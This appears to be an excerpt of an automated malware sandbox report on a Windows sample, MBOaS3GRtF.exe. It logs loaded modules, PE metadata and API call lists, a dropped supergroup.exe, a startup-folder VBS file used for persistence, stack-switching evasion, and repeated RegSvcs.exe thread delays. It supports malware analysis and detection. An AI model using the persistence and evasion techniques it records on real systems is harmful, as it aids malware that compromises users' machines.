Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MBOaS3GRtF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MBOaS3GRtF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: supergroup.exe, 00000002.00000003.1394176182.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000002.00000003.1393379935.0000000003970000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1560299894.0000000004130000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1559995710.00000000042D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: supergroup.exe, 00000002.00000003.1394176182.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000002.00000003.1393379935.0000000003970000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1560299894.0000000004130000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1559995710.00000000042D0000.00000004.00001000.00020000.00000000.sdmp

Source: MBOaS3GRtF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MBOaS3GRtF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MBOaS3GRtF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MBOaS3GRtF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MBOaS3GRtF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA4B37 LoadLibraryA,GetProcAddress,

0_2_00AA4B37

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC8945 push ecx; ret	0_2_00AC8958
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001CC4C6 push A3001CBAh; retn 001Ch	2_2_001CC50D
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E8945 push ecx; ret	2_2_001E8958

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

File created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00AA48D7
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B25376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00B25376
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_001C48D7
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00245376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00245376

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00AC3187

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	API/Special instruction interceptor: Address: D9955C
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	API/Special instruction interceptor: Address: 1903B34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599021	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598852	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596362	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596111	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
